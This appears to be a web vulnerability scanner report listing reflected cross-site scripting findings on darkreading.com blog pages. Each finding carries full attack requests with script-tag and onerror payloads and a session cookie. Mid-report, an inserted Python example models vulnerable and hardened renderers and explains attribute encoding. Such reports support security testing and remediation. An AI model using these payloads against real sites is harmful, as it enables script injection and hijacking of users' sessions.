<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Virtual M ...[SNIP]... tual-machines-for-fun-profit-and-pwnage.html32ec9%22%3E%3Ca%3Ecf08a1794b7&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html32ec9"><a>cf08a1794b7"> ...[SNIP]...
3.215. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 451dd"><script>alert(1)</script>cc54c12462d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html?451dd"><script>alert(1)</script>cc54c12462d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c14ff"><a>07d4fb549af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700535c14ff"><a>07d4fb549af/using-the-36-stratagems-for-social-engineering.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f693d'><img%20src%3da%20onerror%3dalert(1)>41e2542c8f3 was submitted in the REST URL parameter 3. This input was echoed as f693d'><img src=a onerror=alert(1)>41e2542c8f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.htmlf693d'><img%20src%3da%20onerror%3dalert(1)>41e2542c8f3 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 208bd"><a>6d68db41da5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html208bd"><a>6d68db41da5 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Using The ...[SNIP]... 6-stratagems-for-social-engineering.html208bd%22%3E%3Ca%3E6d68db41da5&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html208bd"><a>6d68db41da5"> ...[SNIP]...
3.219. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e32e"><script>alert(1)</script>e89c34f8e53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html?8e32e"><script>alert(1)</script>e89c34f8e53=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97406"><a>9c13987c8d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770054597406"><a>9c13987c8d1/snort-ing-out-anomalies.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d507'><img%20src%3da%20onerror%3dalert(1)>01ef1e0a04d was submitted in the REST URL parameter 3. This input was echoed as 2d507'><img src=a onerror=alert(1)>01ef1e0a04d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700545/snort-ing-out-anomalies.html2d507'><img%20src%3da%20onerror%3dalert(1)>01ef1e0a04d HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"><a>badd16bacb3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700545/snort-ing-out-anomalies.html5b8d1"><a>badd16bacb3 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Snort'ing ...[SNIP]... rkreading.com%2Fblog%2F227700545%2Fsnort-ing-out-anomalies.html5b8d1%22%3E%3Ca%3Ebadd16bacb3&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html5b8d1"><a>badd16bacb3"> ...[SNIP]...
3.223. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700545/snort-ing-out-anomalies.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e908b"><script>alert(1)</script>a69370484ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700545/snort-ing-out-anomalies.html?e908b"><script>alert(1)</script>a69370484ad=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
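The three reflection patterns reported above (a payload landing in a single-quoted attribute value, a payload landing in a double-quoted one, and a parameter name echoed into a double-quoted attribute) reduce to one check: does the canary-wrapped payload come back byte-for-byte inside an attribute value whose quote character the payload opens with? The Python below is an added example written for this page; it is not the scanner's code and not darkreading.com's code. It models the response snippet seen in these findings (the request URL copied once URL-encoded into a redirect query string and once raw into a quoted href attribute) with two assumed renderers, one vulnerable and one hardened with HTML attribute encoding, and runs the same classification over both. The canary strings, the login.example host, the article path reuse and all function names are constructed for the example.

```python
import html
import re
from urllib.parse import quote

# Constructed canaries and probes, in the style of the report's payloads.
PREFIX, SUFFIX = "5b8d1", "badd16bacb3"
PAYLOAD_DQ = '"><a>'                            # closes a double-quoted attribute, opens a tag
PAYLOAD_SQ = "'><img src=a onerror=alert(1)>"   # closes a single-quoted attribute, runs script

ARTICLE = "/blog/227700545/snort-ing-out-anomalies.html"   # path taken from the report


def render_vulnerable(request_url: str, q: str = '"') -> str:
    """Assumed vulnerable template modelled on the response snippet: the request
    URL is reflected twice, URL-encoded inside the redirect query string and then
    raw inside the attribute value.  `q` is the quote style of that attribute."""
    return (
        "<a href=" + q + "http://login.example/?redirect=" + quote(request_url, safe="")
        + "&siteId=300001&successfulLoginRedirect=" + request_url + q + ">Log in</a>"
    )


def render_hardened(request_url: str, q: str = '"') -> str:
    """Same template with HTML attribute encoding at the output point; html.escape
    with quote=True turns both quote characters and angle brackets into entities."""
    return (
        "<a href=" + q + "http://login.example/?redirect=" + quote(request_url, safe="")
        + "&siteId=300001&successfulLoginRedirect=" + html.escape(request_url, quote=True)
        + q + ">Log in</a>"
    )


def reflections(body: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> list:
    """Every prefix...suffix occurrence in the body: the text echoed between the
    canaries and the quote character that opened the attribute value it sits in
    (None when the canary is not inside a quoted attribute value)."""
    found = []
    for m in re.finditer(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S):
        head = body[: m.start()]
        # The attribute is still open if an =" or =' precedes the canary with no quote since.
        ctx = re.search(r"""=\s*(["'])[^"']*\Z""", head)
        found.append({"echoed": m.group(1), "quote": ctx.group(1) if ctx else None})
    return found


def classify(body: str, payload: str) -> str:
    """'unmodified' when any reflection carries the payload byte-for-byte (the
    report's "echoed unmodified"), 'encoded' when it only comes back transformed,
    'absent' when the canaries never return."""
    found = reflections(body)
    if not found:
        return "absent"
    if any(r["echoed"] == payload for r in found):
        return "unmodified"
    return "encoded"


def breaks_out(body: str, payload: str) -> bool:
    """True when an unmodified reflection sits in an attribute whose quote
    character is the one the payload starts with: the payload then terminates the
    attribute value and the '>' that follows closes the tag, so new markup lands
    in the document.  A double-quote payload inside a single-quoted attribute does
    not break out, which is why the report probes both quote styles separately."""
    return any(r["echoed"] == payload and r["quote"] == payload[0]
               for r in reflections(body))


if __name__ == "__main__":
    for q, payload in (('"', PAYLOAD_DQ), ("'", PAYLOAD_SQ)):
        url = ARTICLE + PREFIX + payload + SUFFIX
        for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
            body = render(url, q)
            print(f"{name:10} attr={q} {classify(body, payload):10} breaks_out={breaks_out(body, payload)}")
```

The point worth taking from the example is that the same input is reflected twice and only the second copy is exploitable: a check that stops at the first match (the percent-encoded copy in the query string) would classify the input as encoded and miss the finding, so every occurrence of the canaries has to be examined. On the remediation side, the percent-encoded copy is already safe because percent-encoding leaves no quote or angle bracket in the attribute; the raw copy needs HTML attribute encoding at the point where the value is written into the page, which is what the hardened renderer does.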
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464b9"><a>708983cfdee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700548464b9"><a>708983cfdee/real-world-attacks-with-social-engineering-tookit.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4066'><img%20src%3da%20onerror%3dalert(1)>9ce9250d8a9 was submitted in the REST URL parameter 3. This input was echoed as f4066'><img src=a onerror=alert(1)>9ce9250d8a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.htmlf4066'><img%20src%3da%20onerror%3dalert(1)>9ce9250d8a9 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26401"><a>1987aa66c35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html26401"><a>1987aa66c35 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Real-Worl ...[SNIP]... s-with-social-engineering-tookit.html26401%22%3E%3Ca%3E1987aa66c35&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html26401"><a>1987aa66c35"> ...[SNIP]...
3.227. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7d0"><script>alert(1)</script>dfe18398e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html?ef7d0"><script>alert(1)</script>dfe18398e9a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60c74'><img%20src%3da%20onerror%3dalert(1)>1727b95a01f was submitted in the REST URL parameter 3. This input was echoed as 60c74'><img src=a onerror=alert(1)>1727b95a01f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html60c74'><img%20src%3da%20onerror%3dalert(1)>1727b95a01f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88ab9"><a>125a31d3d96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html88ab9"><a>125a31d3d96 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Suspected ...[SNIP]... 77%2Fsuspected-child-porn-hub-taken-offline.html88ab9%22%3E%3Ca%3E125a31d3d96&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html88ab9"><a>125a31d3d96"> ...[SNIP]...
3.230. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db01"><script>alert(1)</script>360360a683a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html?9db01"><script>alert(1)</script>360360a683a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce99c"><a>0ff75152fde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700656ce99c"><a>0ff75152fde/friction-free-security.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83517'><img%20src%3da%20onerror%3dalert(1)>6a5a66b0718 was submitted in the REST URL parameter 3. This input was echoed as 83517'><img src=a onerror=alert(1)>6a5a66b0718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700656/friction-free-security.html83517'><img%20src%3da%20onerror%3dalert(1)>6a5a66b0718 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94d"><a>e36f7092b58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700656/friction-free-security.htmldd94d"><a>e36f7092b58 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Friction- ...[SNIP]... darkreading.com%2Fblog%2F227700656%2Ffriction-free-security.htmldd94d%22%3E%3Ca%3Ee36f7092b58&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700656/friction-free-security.htmldd94d"><a>e36f7092b58"> ...[SNIP]...
3.234. http://www.darkreading.com/blog/227700656/friction-free-security.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700656/friction-free-security.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e48"><script>alert(1)</script>c289f73ad81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700656/friction-free-security.html?f2e48"><script>alert(1)</script>c289f73ad81=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e2f"><a>c5535a3f793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770068294e2f"><a>c5535a3f793/protecting-your-network-from-the-unpatchable.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48b6b'><img%20src%3da%20onerror%3dalert(1)>d0fbaa2056e was submitted in the REST URL parameter 3. This input was echoed as 48b6b'><img src=a onerror=alert(1)>d0fbaa2056e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html48b6b'><img%20src%3da%20onerror%3dalert(1)>d0fbaa2056e HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b335"><a>a12afae223 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html4b335"><a>a12afae223 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Protectin ...[SNIP]... ting-your-network-from-the-unpatchable.html4b335%22%3E%3Ca%3Ea12afae223&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html4b335"><a>a12afae223"> ...[SNIP]...
3.238. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237c3"><script>alert(1)</script>6549d20e526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html?237c3"><script>alert(1)</script>6549d20e526=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e41"><a>2b538cc6f88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770074134e41"><a>2b538cc6f88/conquering-large-web-apps-with-solid-methodology.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
